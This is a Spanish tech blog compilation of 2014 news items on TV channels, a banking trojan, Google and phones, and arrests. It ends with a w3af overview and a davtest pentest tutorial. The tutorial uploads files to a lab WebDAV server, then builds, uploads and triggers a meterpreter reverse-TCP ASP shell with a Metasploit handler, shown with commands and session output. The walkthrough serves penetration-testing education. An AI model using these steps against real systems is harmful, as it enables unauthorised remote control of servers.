jueves, 29 de mayo de 2014

Si usted se creyó aquello de que con la TDT se ponía en marcha una televisión multicanal, con una mayor y más amplia oferta de programación y con opciones para el desarrollo de canales temáticos, quizás deba de ir replanteándose esta creencia. La TDT va camino del desalojo de la mayoría de sus canales. Este pasado 6 de mayo desaparecieron nueve canales de TDT (cinco con emisiones en abierto, uno de pago y otras tantas teletiendas que en su momento estuvieron ocupados por canales temáticos o generalistas). El panorama durante los próximos meses es desolador.

El Gobierno confirma que prescindirá de un multiplex para RTVE y otro para autonómicas


RTVE podría perder un múltiplex. Este hecho podría poner en peligro el futuro de las retransmisiones HD de Teledeporte y La 1, además de poder obligar a los responsables del ente público a reducir su oferta en TDT. La situación es todavía más complicada en el caso de los entes autonómicos, puesto que en algún caso las iniciativas privadas comparten espacios en TDT con canales autonómicos públicos. Cataluña está en pie de guerra porque pasará de tres a dos mútliplex, pero en otras comunidades también podría haber recortes o cese de canales aprovechando esta reducción de espacio.

Ocho canales más en peligro


Y aquí no acaba la cosa puesto que el Tribunal Supremo de Justicia todavía estudia una denuncia contra otros ocho canales de TDT que habrían obtenido su licencia mediante un procedimiento que tampoco se habría ajustado a la legalidad. De prosperar esta demanda (procedente de la misma empresa que ya consiguió tumar nueve canales de TDT), parece que el Gobierno no pondría trabas a su ejecución. Este hecho conduciría, de manera irrevocable, a una reordenación profunda de la TDT, que pasaría necesariamente por un nuevo concurso de licencias de TDT.

La solución: ¿un nuevo concurso?


En estos dimes y diretes, parece tomar forma la posibilidad de que en un plazo de un año se pueda convocar un concurso para otorgar nuevas licencias de TDT. El Gobierno no va a anunciar oficialmente este concurso a corto plazo más allá de la declaración pública que ha realizado: primero va el dividendo digital, y después, si hay huecos, nuevas licencias saldrán a concurso. Parece que con la eliminación de canales autonómicos y de RTVE, podría haber huecos, aunque en cualquier caso es muy posible que la situación deje una TDT muy tocada en su línea de flotación.

http://www.adslzone.tv/2014/05/29/la-tdt-podria-volver-dejar-el-panorama-televisivo-en-menos-de-una-decena-de-canales/

Nuevo troyano que envía falsas facturas de tu compañía de teléfono e Internet

Un nuevo malware ha hecho su aparición, esta vez en forma de un troyano que se está propagando a través del correo electrónico de miles de usuarios de banca online afectados. El troyano incluye facturas falsas de operadoras de telecomunicaciones o de bancos reales, como por ejemplo Vodafone o Deutsche Telekom. Según la empresa de seguridad G Data Software, “su modus operandi es similar al utilizado en otras ocasiones y, desafortunadamente, es relativamente sencillo que volvamos a encontrarnos con él más adelante, en Alemania o en cualquier otro país, pues el cibercrimen no tiene fronteras”.




El troyano se propaga a través de correos electrónicos no deseados (spam) que contienenreclamaciones de pagos o facturas falsas en archivos adjuntos, además de varios enlaces que nos conducen a sitios maliciosos. Si entramos en uno de estos sitios, se descarga el troyano bancario denominado Swatbanker, que tiene características similares a otro conocido troyano llamado Cridex.Este último se dio a conocer a principios de este año y tiene la capacidad de robar los datos bancarios de los afectados. El nuevo troyano ha conseguido bastante éxito desde mediados de este mes debido, en gran parte, a la gran similitud entre los correos falsos y los originales de las compañías suplantadas.

Consejos de G Data SecurityLabs


Los expertos en seguridad de G Data SecurityLabs han dado una serie de consejos para prevenir a los usuarios sobre este tipo de correos que tienen contenido malicioso. Los consejos son los siguientes:

  1. Principalmente, hay que utilizar en nuestro equipo una solución de seguridad que tenga cortafuegos y protección web en tiempo real. También es importante que cuente con un filtro de spam para proteger el equipo de correos maliciosos.
  2. Hay que ser precavido con los correos de remitentes desconocidos. Si un email parece extraño o sospechoso debemos ignorarlo y borrarlo.
  3. Nunca hay que abrir los archivos adjuntos ni hacer clic en los enlaces contenidos en un correo sospechoso y hay que analizarlos con un antivirus.
  4. No se debe responder a un correo no deseado. Si lo hacemos, los estafadores sabrán que esa cuenta está activa.
  5. Nunca debemos revelar ninguna información personal a remitentes desconocidos ni introducir datos en páginas web que parezcan sospechosas.
  6. Nunca se debe hacer una transferencia bancaria a un organismo, empresa o persona desconocida, aunque nos lo hayan indicado por email
  7. Es importante evitar publicar nuestra dirección de correo públicamente, por ejemplo en foros online, ya que los estafadores pueden verla y enviarnos correos no deseados.


http://www.adslzone.net/2014/05/29/nuevo-troyano-que-envia-falsas-facturas-de-tu-compania-de-telefono-e-internet/

Un español utiliza marcas como Antena 3 en Google Play para robar datos

Las tiendas de aplicaciones oficiales de los diferentes sistemas operativos móviles son el nicho de estafadores que, con aplicaciones fraudulentas, tratan de robarnos datos de todo tipo. Ya sea información financiera, datos de nuestro teléfono, o simplemente sacarnos algunos céntimos de euro a costa de nada, solamente humo. Y es que, aunque no es nueva esta situación, un informático español está formando revuelo por la enorme red de aplicaciones que ha montado para sacar el dinero a los usuarios de Google Play Store, la tienda oficial de Android. Para ello, no tiene pudor alguno en valerse de marcas conocidas como Antena 3, La Sexta, Cuatro y muchas otras.



http://www.movilzona.es/2014/05/29/una-espanol-utiliza-marcas-como-antena-3-en-google-play-para-robar-datos/

martes, 27 de mayo de 2014

Obama aún usa su viejo BlackBerry (por motivos de seguridad)

Cuánto cuesta abandonar los hábitos adquiridos. La comodidad, la resistencia al cambio… o simplemente que te enganchas con un jueguecillo que sólo existe para tu vetusto terminal y no tienes ganas de adquirir un móvil más moderno por no perder dicho juego… o simplemente por evitarte tener que pasar tooooooda la agenda de contactos a otra plataforma. La cuestión es que el presidente de los Estados Unidos de América, años después, continúa usando su viejo BlackBerry.

Algunos sostienen que BlackBerry aún no ha cerrado básicamente porque el presidente Barack Obama necesita que alguien siga fabricando su móvil favorito. En su momento fue todo un símbolo de estatus de una clase de hombres de negocios repleta de pioneros de la omniconectividad pero hoy son casi un reducto de nostálgicos.


obama blackberry

http://www.theinquirer.es/2014/05/27/obama-aun-usa-blackberry.html

Bloquean el dominio del popular portal P2P Torrentz.eu

Torrentz.eu, el popular buscador de archivos torrent con los resultados de las páginas P2P más importantes, ha visto como la Policía de Reino Unido ha suspendido el dominio. Los responsables de este portal ya trabajan en trasladar el dominio a otro registrador y por ahora existen dos alternativas para seguir accediendo.

Desde torrentfreak nos cuentan la historia completa que ha terminado con la suspensión del dominio Torrentz.eu. Todo se remonta a algunos meses atrás, cuando la Policía de Londres comenzó a trabajar con los titulares de los derechos de propiedad intelectual para cerrar algunas de las webs que otorgan acceso a “contenido pirateado”.

http://www.adslzone.net/2014/05/26/bloquean-el-dominio-del-popular-portal-p2p-torrentz-eu/

Un bug provocará que los equipos de 32 bits dejen de funcionar en el 2038

Aquellos equipos que sobrevivieron al "bug del 2000" pueden vivir momentos similares de tensión en el 2038.

De nuevo una grave amenaza se cierne sobre la industria tecnológica. Se trata del llamado "bug del 2038" y consiste básicamente en el hecho de que el reloj de todos los equipos basados en una arquitectura de 32 bits se "reiniciará" el 19 de enero de 2038.

En ese momento, el reloj de los equipos que aún estén en marcha en ese año, pasaría a marcar la fecha del 1 de enero de 1970, fecha de inicio del primer sistema operativo Unix.

El problema viene determinado a que el mayor numero que puede gestionar una plataforma de 32 bits es 2147483647 y si lo aplicamos a los segundos desde la fecha de inicio nos conduce al 19 de enero de 2038.

Los equipos de 64 bits estarían a salvo de este bug pero deberíamos actualizar el software para estos ordenadores ya que en su mayoría corren aplicaciones ideadas para 32 bits.

jueves, 22 de mayo de 2014

Escaner de Vulnerabilidades: w3af

Hoy hablaremos sobre el potente escaner de vulnerablilidades w3af (Muy usado por mi):

w3af (Web Application Attack and Audit Framework) es una herramienta open source de auditoría que permite detectar vulnerabilidades web y explotarlas. Es bastante sencilla de utilizar y muy útil para automatizar diferentes análisis en un sólo proceso. El proyecto nació en el año 2006 de la mano de Andrés Riancho, fundador de la empresa de seguridad Bonsai, y hoy cuenta con el apoyo de toda la comunidad de especialistas en seguridad web.

Básicamente se trabaja con 4 pestañas, en Configuración del análisis se indica el objetivo y se seleccionan los plugins o escáneres que se desean utilizar; en Log se puede ver el estado del proceso; en Resultados las vulnerabilidades detectadas con lujo de detalles (SQL Injection, Cross Site Scripting, Full Path Disclosure, File Inclusion, etc); y finalmente desde la pestaña Exploit se pueden explotar estos fallos.

Si deseas entender un poco más el alcance de este tipo de herramientas te recomiendo leer este artículo de Infosec Resources (en inglés), se muestra a modo de ejemplo como una vulnerabilidad sql injection detectada con w3af, permite obtener las contraseñas de un blog en WordPress.




Por supuesto, w3af no busca ser un programa de haking malintencionado, si bien parece que con unos simples clics se puede hacer de todo, es necesario tener ciertos conocimientos y ganas de entender lo que sucede para poder sacarle provecho.

Descarga: w3af.sourceforge.net/#download
Se puede instalar en Windows y Linux (apt-get install w3af), si tienes Backtrack puedes ejecutar la interfaz gráfica desde /pentest/web/w3af ./w3af_gui


http://www.expresionbinaria.com/w3af-herramienta-para-detectar-vulnerabilidades-web/

miércoles, 21 de mayo de 2014

Google desbanca a Apple como la marca más valiosa del planeta

Google es la marca más valiosa del mundo tras desbancar a Apple al frente del ranking anual Brandz Top 100, elaborado por la consultora Millward Brown Optimor, en el que solo están las españolas Zara, Movistar y Santander.

Google supera a Apple en el ranking de 2014 y se convierte en la marca global más valiosa, con un valor de 158.843 millones de dólares (116.253 millones de euros), lo que representa un aumento del 40% respecto al año anterior. Después de tres años, Apple ha caído al puesto número dos con un descenso del valor de su marca del 20%, hasta los 147.880 millones de dólares (108.229 millones de euros).

La consultora señala que, aunque Apple se mantiene como una marca de gran prestigio, existe una percepción creciente de que ya no está redefiniendo la tecnología para los consumidores, reflejado en la «dramática ausencia» de lanzamientos de nuevos productos. «Google ha sido muy innovadora durante el año pasado con desarrollos como las Google Glass, inversiones en inteligencia artificial y una multitud de colaboraciones que ven como su sistema operativo Android se integrará en otros productos como los coches», explica el director gerente de Millward Brown Optimor, Nick Cooper.

Cooper añade además que toda esta actividad representa «un importante mensaje para los consumidores sobre qué es Google y además ha coincidido con una desaceleración de Apple». En el tercer puesto repite IBM, pese a que su valor de marca se ha reducido un 4%, hasta los 107.541 millones de dólares (78.701 millones de euros). 
 
A continuación, Microsoft asciende del séptimo al cuarto puesto, relegado a McDonald's al quinto. El resto de las diez primeras posiciones del ranking Brandz Top 100 las ocupan Coca-Cola, Visa, AT&T, Malboro y Amazon.com.

Las tres marcas españolas repiten un año más en esta clasificación después de que todas ellas hayan registrado un incremento en el valor de su marca respecto al año anterior, aunque en el caso de Zara no le ha impedido descender dos posiciones en el ranking. En concreto, Zara aparece como la primera marca española de la clasificación, donde ocupa el puesto 37 con una valoración de marca de 23.140 millones de dólares (16.934 millones de euros), un 15% más que hace un año.

http://www.abc.es/tecnologia/20140521/abci-google-apple-marcas-valioss-201405211533.html

Seis editores Markdown (y algunas alternativas) para olvidarse del HTML

Hace unos meses os explicamos lo que era Markdown: un lenguaje de sintaxis con el que escribir artículos como este se vuelve mucho más sencillo y sin necesidad de aprenderse las engorrosas etiquetas HTML. Basta con aprenderse la sintaxis básica y cualquier editor de texto llano basta para escribir, pero siempre podemos optar a utilizar editores más preparados para ello (sobretodo si estamos trabajando desde un dispositivo móvil).

Como me paso el día escribiendo artículos, siempre estoy buscando editores que más se adecuan a mi forma de trabajar. Y en Genbeta ya os hemos mostrado unos cuantos, pero creo que ha llegado la hora de modernizar la lista con más opciones. Vamos con una lista de cinco editores Markdown para escribir en nuestros terminales, sean cuales sean.


teclado




http://www.genbeta.com/herramientas/seis-editores-markdown-y-algunas-alternativas-para-olvidarse-del-html

Orange prueba 4G Advanced en Valencia. Más de 200 megas reales

El operador naranja presentó ayer en Valencia la nueva tecnología 4G Advanced que es capaz de alcanzar 300 Mbps de forma teórica y que en rendimiento real está muy cerca de alcanzar dicha cifra, obteniendo un rendimiento medio excepcional.

Nuestros compañeros de RedesZone acudieron ayer a una presentación de Orange en Valencia sobre la nueva tecnología 4G Advanced. En la presentación, el operador naranja demostró el rendimiento de la nueva conexión inalámbrica de alta velocidad que es capaz de alcanzar 300 Mbps en rendimiento teórico, pero como podréis comprobar a continuación, en rendimiento real no anda muy lejos. La tecnología 4G Advanced es una evolución del 4G que permite al usuario utilizar las bandas de 1.800 MHz y 2.600 MHz de forma simultánea, duplicando la velocidad teórica hasta los 300 Mbps, frente a los 150 Mbps del 4G, y que supera ampliamente las velocidades del ADSL2+, del VDSL2 y del HSPA+ actual.
 
huawei_e5186_orange_lte_advanced 
 
http://www.adslzone.net/2014/05/21/orange-prueba-4g-advanced-en-valencia-mas-de-200-megas-reales/

Bq presenta su gama E, los primeros «smartphones» diseñados en España

Cuatro terminales nuevos de una sola tacada. Los primeros totalmente diseñados por los ingenieros de una de las empresas tecnológicas españolas que más han crecido en los últimos años. Los dos edificios, varias divisiones y cerca de setecientos empleados que forman actualmente la empresa quedan ya muy lejos de aquel grupo de estudiantes de telecos que un buen día decidió montar una empresa para hacer llaves de memoria. Después vinieron los móviles, las «tablets», los e-readers, las impresoras 3D, la robótica... Cuatro terminales para la nueva serie E, los primeros smartphones diseñados totalmente en España. Se trata de los Bq Aquaris E6, E5, E4.5 y E4. Lo que significa que habrá un terminal para cada gama, desde la de entrada a los que incluyen las máximas prestaciones. Con una original estructura formada por una aleación de magnesio y aluminio, los cuatro móviles, que van desde las cuatro a las seis pulgadas, son ligeros y resistentes.



http://www.abc.es/tecnologia/moviles-telefonia/20140521/abci-smartphones-gamae-espana-201405211231.html

lunes, 19 de mayo de 2014

Detenido por instalar una aplicación en el móvil de su novia para espiarla

La Guardia Civil de Burgos ha detenido a un joven de 23 años, D.H.P, como supuesto autor de un delito de descubrimiento y revelación de secretos --delito contra la intimidad-- relacionado con la instalación en el móvil de su pareja de una aplicación con el propósito de mantenerla controlada, según informaron a Europa Press fuentes de la Subdelegación del Gobierno.

La detención hoy conocida se produjo este domingo en una localidad del Alfoz por hechos ocurridos días atrás, cuando el citado joven pidió el móvil a su pareja bajo el pretexto de pretender actualizárselo. Sin embargo, D.H.P. aprovechó para instalar una aplicación espía con la que controlaba, en tiempo y lugar, la posición del terminal telefónico, así como las llamadas y mensajes de su propietaria.

La persona perjudicada sospechó cuando empezó a notar que la batería del móvil duraba pocas horas, ante lo cual optó por denunciar los hechos.

En el curso de las pesquisas, guardias civiles del Puesto Principal de Alfoz de Burgos localizaron al supuesto autor, quien admitió los hechos y por los que fue finalmente detenido.

El teléfono móvil del 'espía' ha sido intervenido para su estudio por parte de personal del Equipo de Investigación Tecnológica (EDITE) de la U.O.P.J. de Burgos.

Las diligencias instruidas han sido entregadas en el Juzgado de Instrucción número 1 de Burgos.

http://www.publico.es/actualidad/521729/detenido-por-instalar-una-aplicacion-en-el-movil-de-su-novia-para-espiarla

Nuevo casco-máscara de gas del Ejército USA: Darth Vader querría uno igual

Con la doble misión de proteger la cabeza y los pulmones de los soldados estadounidenses el Ejército de dicho país ha desarrollado a través del Centro QUímico y Biológico Edgewood una combinación de casco y máscara de gas que nos puede resultar por igual evocador de los célebres cascos del Señor Oscuro del Sith o incluso del Jefe Maestro de “Halo”.

La fusión de las dos herramientas de protección emplea un sistema de ventiladores internos para mantener fresca la cabeza del usuarios además de mantener presurizado el conjunto para evitar la entrada de aire contaminado desde el exterior. Con ello se consigue una mayor comodidad en entornos contaminados donde el soldado vaya a tener que actuar durante períodos de tiempo prolongado


Army gas mask

Espectacular vídeo del híbrido humano-Hummer-Transformer

Ni el propio Michael Bay había llegado tan lejos. Hasta ahora los Transformers se habían limitado a adoptar la forma de vehículos terrestres pero faltaba añadir un elemento de humanidad y esto es lo que pueden encontrarse por la calle los viandantes de Ann Arbor (Michigan, USA) como comprobarás en el increíble vídeo que te mostramos a continuación.

Los niños parecen jubilosos y entrechocan las palmas de sus manos con un señor de aspecto singular, con curiosos aditamentos mecánicos adosados a su cuerpo.

“Assassins Creed: Pirates” ya disponible en tu ordenador como juego para ...

Se nos avisó sobre la disponibilidad limitada de este título para dispositivos móviles, lo que dejó a muchos con las ganas de poder disfrutarlo en sus ordenadores, pero gracias a la conversión hecha por Ubisoft para navegadores de Internet ya podemos disfrutar de este título en equipos de sobremesa y portátiles.

Aunque en un primer momento Ubisoft dejó fuera a ordenadores y consolas con el lanzamiento de “Assassins Creed: Pirates” parece que al menos los primeros van a ser afortunados pudiendo conectarse a Internet y disfrutar de la versión del mismo específica para navegadores.

pirates



http://www.theinquirer.es/2014/05/19/assassins-creed-pirates-ya-disponible-en-tu-ordenador-como-juego-para-navegadores-de-internet.html

domingo, 18 de mayo de 2014

Nuestro 'erizo' es vuestro ordenador

Uno, dos, tres, cuatro, cinco... Aprender a contar hasta cinco es clave en la educación de un niño. No saber hacerlo es -acaso- peor que el analfabetismo. Es el número clave en esta historia. En 1943, Thomas Watson, presidente de IBM, soltó una frase rotunda: «Creo que existe mercado para unos cinco ordenadores en todo el mundo». Erró. Hoy, son cinco mil millones de personas las que no tienen acceso al uso de uno. Se han convertido en analfabetos informáticos, la nueva ola del subdesarrollo, un abismo digital que hoy es insalvable para los pobres. Hay esperanza. Dos treintañeros, uno israelí, otro italiano, Nissan Bahar y Franky Imbesi, podrían haber encontrado la solución por cinco euros [siete dólares]. Lo que cuesta su erizo, un pincho USB que almacena un sistema operativo y distintos programas. La vía para el «acceso a un ordenador para todos», como dice el eslogan de Keepod, la organización fundada por ellos La bautizaron así porque significa erizo en hebreo y combina dos palabras: una inglesa «keep» (guardar), otra hebrea «od» (todo). Su logotipo es este animal con cinco puntas en el lomo.

http://www.elmundo.es/cronica/2014/05/18/53775edaca4741f47e8b456e.html

Google necesita más tiempo para ‘olvidar’ a la gente

Esta semana la Unión Europea ha dicho a Google que los usuarios tienen ‘derecho al olvido’ en la web y que, por tanto, todos los buscadores, Google incluido, están en la obligación de atender las demandas de los usuarios y si cumplen los requisitos borrar los enlaces. En Mountain View ya han dicho que van a necesitar un tiempo para poder hacer frente a tantas peticiones.

EL Tribunal de Justicia de la Unión Europea (TJUE) falló esta semana a favor del ‘derecho al olvido’. Por ello cualquier ciudadano tiene derecho a exigir la cancelación de sus datos personales que aparecen en buscadores de Internet cuando la información hacia la que enlacen trate hechos carentes de relevancia pública y comporten un perjuicio grave o una lesión para los derechos del afectado.

Pero claro, para Google, el mayor buscador del mundo y el más utilizado, y al que iba dirigida la sentencia en la práctica, puede suponer un trabajo impresionante si las demandas del derecho al olvido se disparan a partir de ahora, como se supone que va a ocurrir.

“Necesitamos tiempo”


Por ello, Google ya ha informado de que no va a ser tan sencillo cumplir la sentencia, por lo que piden tiempo al tribunal y a aquellas personas que se hayan visto perjudicadas por seguir apareciendo enlaces perjudiciales para ellos en el buscador.

Además de todo el trabajo que pueda suponer eliminar enlaces concretos, incluidos los que se encuentren en otros idiomas, también tiene que decidir si un enlace no lo elimina por ser de interés público.

Veremos a ver cómo sale de este lío Google, y si lo puede hacer pronto, aunque no tiene pinta. Parece ser que, si alguno de vosotros desea eliminar un enlace que os perjudique, lo primero que tendrá que ser es muy paciente. Google puede tardar semanas o meses en tramitar tu solicitud.

Google

Fuente: Neowin.

http://www.softzone.es/2014/05/18/google-necesita-mas-tiempo-para-olvidar-la-gente/

Retiran la 'app' de WhatsApp de la tienda de Windows Phone

WhatsApp para Windows Phone ha dejado de estar disponible en la tienda de apps oficial para el sistema operativo de Microsoft. Por el momento desde la compañía no se han pronunciado sobre la retirada de la aplicación y se desconocen los motivos por los que se ha producido.

El servicio de mensajería WhatsApp estaba disponible para Windows Phone hasta este domingo. La aplicación sigue contando con página en la tienda de Windows Phone, pero aparece un mensaje en el que se informa que no está disponible para su descarga. De esta forma, WhatsApp ha desaparecido sin que se haya producido una explicación desde la compañía, aunque según algunos portales especializados se podría deber a "razones técnicas".

El servicio, ahora propiedad de Facebook, ha experimentado algunos problemas en Windows Phone, en donde no recibe una actualización desde el 10 de enero de este año. Dichos problemas podrían ser la causa de la retirada de la app, aunque por el momento ni Whatsapp ni Microsoft se han pronunciado.

La retirada de WhatsApp de la tienda de Windows Phone significa que los nuevos usuarios del sistema de Microsoft por el momento no pueden proceder a su instalación. Sin embargo, los usuarios que ya hayan instalado WhatsApp en sus terminales parece que podrán seguir usando el servicio como hasta ahora.

viernes, 16 de mayo de 2014

Un joven de 19 años, primer detenido por pedir el asesinato de políticos en ...

La Guardia Civil ha detenido en Tavernes de la Valldigna (Valencia) a un joven de 19 años del entorno de grupos antisistema por un supuesto delito de apología para la comisión de delitos de asesinato en Twitter, según ha confirmado el Instituto Armado . Se trata del primer detenido en España por un delito de estas características.

El joven, que tenía 600 seguidores en la red social, llevaba semanas lanzando tuits apoyando la muerte de políticos. Estos mensajes crecieron en número y provocaron el inicio de la operación a raíz del asesinato de la presidenta de la Diputación de León, Isabel Carrasco, con el que mostró su conformidad.

Entre sus frases publicadas en las redes sociales aparecía: " Aixina es faa ostia!! A matarlos a tots!!!! Mes tirs al cap d PPeros!! Isabel CarrasKO" o "Que m'els posen en fila un al costat d l'altre i que em donen un AK-47 qe voràs tu com acabe amb tots eixos fills de putes feixistes d merda" .

Denuncian a cinco estudiantes de Vigo por difundir fotos de una compañera ...

La Policía Nacional ha remitido a la Fiscalía de Menores de Pontevedra las denuncias contra cinco chicos por la distribución de fotos íntimas de una compañera de un céntrico instituto de Vigo, informaron fuentes policiales. Las imágenes remitidas por WhatsApp muestran a la joven, de 13 años, desnuda y en ropa interior.

La Policía interrogó la semana pasada a doce menores de entre 13 y 14 años, de los que finalmente considera responsables de acciones constitutivas de delito a cinco, aunque esa cifra podría aumentar, dado que la distribución de las fotos traspasó el ámbito geográfico de Vigo. La Fiscalía tiene unos 40 expedientes de imputación sobre este caso.

Las fuentes policiales detallan que fue la chica que aparece en las fotos desnuda y en otras en ropa interior quien las distribuyó a través de «Whatsapp» entre varios amigos, uno de ellos su exnovio, pero luego fueron a parar a otras personas de fuera del ámbito de su instituto e incluso de otras ciudades.

http://www.abc.es/local-galicia/20140516/abci-denuncian-companeras-fotos-intimas-201405161052.html

Jins Meme, llegan las nuevas gafas inteligentes japonesas

Las gafas inteligentes de Google, las Google Glass tienen un nuevo rival: los Jins Meme, un dispositivo ponible fabricado por la firma japonesa del mismo nombre que monitorea el movimiento de tus ojos para detectar fatiga y estrés.

Fabricadas por una conocida marca fabricante de gafas, las Jins Meme destacan por su diseño (que luce menos feo que las Google Glass) y capacidad para monitorear el estrés, actividad física y niveles de fatiga del usuario para indicarle cuando es bueno dejar de trabajar, hacer ejercicio o incluso conducir su auto.

Microsoft anuncia Halo 5: Guardians

Microsoft ha anunciado hoy Halo 5: Guardians, una nueva entrega de su popular saga de juegos de acción que se estrenará en Xbox One en "otoño de 2015".

El juego está siendo desarrollado por el equipo responsable de Halo 4, el estudio norteamericano 343 Industries, y supondrá "el siguiente gran capítulo en la legendaria saga del Jefe Maestro".

jueves, 15 de mayo de 2014

Tutorial de davtest scaner


En un WebDAV habilitado,(protocolo que proporciona funcionalidades para crear, cambiar y mover documentos en un servidor remoto) , hay dos cosas por descubrir rápidamente:

1- Si se puede subir archivos,
2- En caso afirmativo, si se puede ejecutar código

Davtest ayuda a responder a estas preguntas intentando cargar la extensión del archivo de prueba de diferentes tipos (por ejemplo, "Php" o ". Txt"), comprueba si estos archivos han sido enviados y luego se puede ejecutar en el servidor.
También le permite subir archivos de texto sin formato y luego intenta utilizar el comando MOVE para cambiar su nombre en un formato ejecutable.
Suponiendo que usted puede cargar un archivo ejecutable, un archivo de prueba no es bueno para el servidor, entonces DAVTest puede descargar automáticamente un shell completamente funcional. Viene con scripts para PHP, ASP, ASPX, CFM, JSP, CGI, PL, y un archivo que se puede probar en un directorio determinado o dejar subir cualquier backdoor que desee.

DAVTest soporta:


Enviar automáticamente los archivos de exploits
Aleatorización automática de directorio para ayudar a ocultar archivos
Enviar archivos de texto y tratar de MOVE para el nombre del ejecutable
Basic y Digest autorización
Automático de limpieza de los archivos subidos
Enviar un archivo arbitrario


Sintaxis


/usr/bin/davtest.pl -url <url> [OPTIONS]


Opciones


-auth+ autorización (usuario: contraseña).Envíe este nombre de usuario / contraseña para Basic o autorización implícita.
-cleanup borrar todo cargado cuando se hace. Elimina todos los archivos puestos con éxito en el servidor antes de salir
-directory+ sufijo parte del directorio a crear.La parte estática del nombre del directorio que se utilizará cuando se ejecuta MKCOL (en lugar del nombre completo al azar)
-debug+ DAV nivel 1-3 (2 + 3 log req / resp a / tmp / perldav_debug.txt) Activar HTTP: Depuración de DAV, que registra en / tmp / perldav_debug.txt).
-move PUT archivos de texto a continuación, pasar al ejecutable. El intento de poner los archivos con extensión txt y luego pasar cuestión de cambiarlo a un nombre de archivo ejecutable.
-nocreate no crea un directorio
-quiet resumen de impresión única antes de salir
-rand+ usar esto en vez de una cadena aleatoria para nombres de archivo
-sendbd+ puertas traseras de envío:
auto - envía un backdoor apropiado para cualquier ejecutable que se realizó correctamente
ext - (por ejemplo, "php") para que coincida con los archivos en el "backdoors /" directorio. No incluya el punto inicial para la extensión.
-uploadfile+ cargar este archivo (requiere-uploadloc)
-uploadloc+ carga de archivos a esta ubicación / nombre (requiere-uploadfile)
-url+ esta es la dirección URL de la ubicación DAV.


Ejemplo


/usr/bin/davtest.pl-url http://localhost/davdir

Prueba de funcionamiento contra la caja laboratorio:

lab @ localhost:. davtest-1.0 # / davtest.pl-url-directory http://192.168.1.4 demo_dir-rand rAnD0M5Tr1nG_upfileP0C-cleanup
************************************************** ******
Prueba de conexión DAV
ABRIR ÉXITO: ​​http://192.168.1.4
************************************************** ******
NOTA cadena aleatoria para esta sesión: rAnD0M5Tr1nG_upfileP0C
************************************************** ******
Creación del directorio
MKCOL ÉXITO: ​​Creado http://192.168.1.4/demo_dir
************************************************** ******
Envío de archivos de prueba
PUT php ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT asp ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
PUT html ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT shtml FALLO
PONER A PRUEBA cgi
PUT txt ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PONER A PRUEBA aspx
PUT pcm ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT jsp ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT pl FALLO
PUT JHTML ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
************************************************** ******
Comprobación de la ejecución de la prueba de archivos
EXEC php FALLO

EXEC asp ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp
EXEC html ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
EXEC txt ÉXITO: ​​http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
EXEC pcm FALLO
EXEC jsp FALLO
EXEC JHTML FALLO
************************************************** ******
Limpiar
BORRAR ÉXITO: ​​http://192.168.1.4/demo_dir
************************************************** ******
. / Davtest.pl Resumen:
Creado: http://192.168.1.4/demo_dir
PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.php
PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp

PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.cfm
PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jsp
PUT archivo: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.jhtml
Ejecuta: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.asp

Ejecuta: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.html
Ejecuta: http://192.168.1.4/demo_dir/rAnD0M5Tr1nG_upfileP0C.txt
Visto: http://192.168.1.4/demo_dir


Como se muestra arriba, vemos que podemos subir php, asp, html, txt, cfm, tipos de archivos JSP y JHTML. Sin embargo, de estos, sólo podemos ejecutar, asp, html y txt.

Esta davtest resumen puede ser una evidencia suficiente para esta vulnerabilidad. En un pentest, sin embargo, puede haber un escenario donde se enfrentan el host de destino está todo bajo llave y sólo un servidor Web se ejecuta en 80/tcp. Entonces, aprovechar esta vulnerabilidad se vuelve significativa y tendremos que ir más allá de esta davtest resumen.

Entonces, ¿qué podemos hacer desde aquí? La tarea obvia es subir un mecanismo de control del servidor de destino. Es decir, subir una cáscara web por ejemplo una cáscara asp vía PUT, a continuación, sólo tiene que llamar y jugar con el servidor.

Podemos generar una carga útil de shell mediante msfpayload.

$ msfpayload windows / meterpreter / reverse_tcp lhost = 192.168.1.1 LPORT = 443 R | msfencode asp-t-o aspmetrev443t.asp

continuación, utilice davtest.pl para subirlo.

/usr/bin/davtest.pl-url-directory http://192.168.1.4 demo_dir-uploadfile aspmetrev443t.asp-uploadloc demo_dir

Exito: http://192.168.1.4/demo_dir/aspmetrev443t.asp

Antes de acceder a esta URL, asegúrese de empezar manejador metasploit multiselector para escuchar las conexiones entrantes de esta carga útil meterpreter shell inversa.

msf-pro>
msf-pro> exploit uso / multi / handler
msf exploit (manejador)> set payload windows / meterpreter / reverse_tcp

msf exploit (manejador)> set lhost 192.168.1.1
msf exploit (manejador)> set LPORT 443
msf exploit (manejador)> exploit

[*] Started inversa controlador en 192.168.1.1:443
[*] A partir del controlador de carga útil ...


Con todo listo ahora, vaya a su aspmetrev443t.asp shell.

[*] Started inversa controlador en 192.168.1.1:443
[*] A partir del controlador de carga útil ...
[*] Envío etapa (748032 bytes) a 192.168.1.4
[*] Periodo de sesiones Meterpreter 1 abierto (192.168.1.4:443 -> 192.168.1.1:56031) 


